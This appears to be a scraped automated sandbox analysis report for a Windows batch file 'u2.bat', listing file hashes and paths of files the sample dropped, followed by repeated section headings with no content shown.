SHA256:	3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\teorema505[1].htm	ASCII text, with very long lines (812), with no line terminators	0B02B8FDAD61F67AF77CBC3BB78DF003	D093EBAE504D101A73725947DAFF82397A8A4F7E	868DB16648B707393C517FA084518F866DF6C2314317445BCEB78C171CDBC1A8
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\upgrade-browser[1].htm	HTML document, Unicode text, UTF-8 text, with very long lines (4343)	F3E0DE3926302E9E31902F8EA4D6E7A2	81A513771E15CE13E8651ECA87AC960404C66684	0189F589E9AB1BD429DDE963341796F6C65ECF2B7383F46ACD1674CFD1F1440C
C:\Users\user\AppData\Roaming\Adobe\1.txt	data	B8E0D660FE237F3F3B6EEAD947CD92CF	8AC70CED7FF5D7C2EF3F63DBA229FB3C43156CD2	F01CC2174199497626CDA4CBE0C4CA66002142889BF5A2A03328C1B024F761E0
C:\Users\user\AppData\Roaming\Microsoft\1.txt	data	8B13195ADDEB7B11832F9C4073707B4B	37EE7C1C67AE387E7F03FBBBFA6A234264A4952C	095FAA55FE5A6AF0A373A7F5C33075E8495FF3CED87D6EA5F0D2E3EFE2EAFD10
C:\Users\user\AppData\Roaming\Mozilla\1.txt	International EBCDIC text, with NEL line terminators	1BFFFDA4770CBB5E7CFDD66531834AEE	B35B5345F988DA8AB1F1688A6B04F506839F9480	7BC856EA33B97F743BE55CADAD185D5B405016305343FE6C38EDD969B33902C0
C:\Users\user\AppData\Roaming\Skype\1.txt	data	29857DCA9DB7ADA16BED5805C1382CD0	E1660DB2930D3B75E15D0E1548FB2A81DA260288	23388E4ECB65EC041F0754D87D71B26ADEBE252AE5E795E8C6C5EF5F565B0588
C:\Users\user\AppData\Roaming\com.adobe.dunamis\1.txt	data	581FF6426183C22BAFA4188F574257A5	70F04998416FBBA0B70629B10D2E33BC63AC1BF4	F35F744DCB7C66F147CFE19DB85D68E021178CB3C31EE1D58A759677E9AF8CAF
C:\Users\user\Desktop\02.dll	PE32+ executable (GUI) x86-64, for MS Windows	0D698AF330FD17BEE3BF90011D49251D	52A7274A0B4F9493632060FE25993A2EF24FE827	3C1C6D813D2B031D988204155FC198FE4F32FF56C05DABBCFCD5486131F4FB9D
C:\Users\user\Desktop\qd_x86.exe	PE32 executable (console) Intel 80386, for MS Windows	31B1A881401E0BA0CAD4C56F1E32C48E	19E491A4C69DE056C77D05BA671870818D4F7F80	7215D9421E0A6D1A7CFDE3F6D742670550FED009585AB35B53CBB845F63C5F74
\Device\ConDrv	ASCII text, with CRLF line terminators	C6FC70AE20773ADBAC81651B9F71ADEF	A78930399ECFE349ABF6DCAAFE63466A21CBC424	F89C17DC34CE3749859F0F5ECDD699FBB8BD2B363B8D35B48ED8C8ECB4D8FBE0
\Device\Null	ASCII text, with CRLF line terminators	455347E871FFF2ABB3613D18E10489BD	D94208B218C974E7B21B1446EFB720B5F118BBAE	B46C71B831C4E0F5BBB28A5EA27C6036BDE815D0141D377230F05A82C3EEA34D

Windows Analysis Report
u2.bat

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report u2.bat

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
u2.bat

Malware Threat Intel
Provided by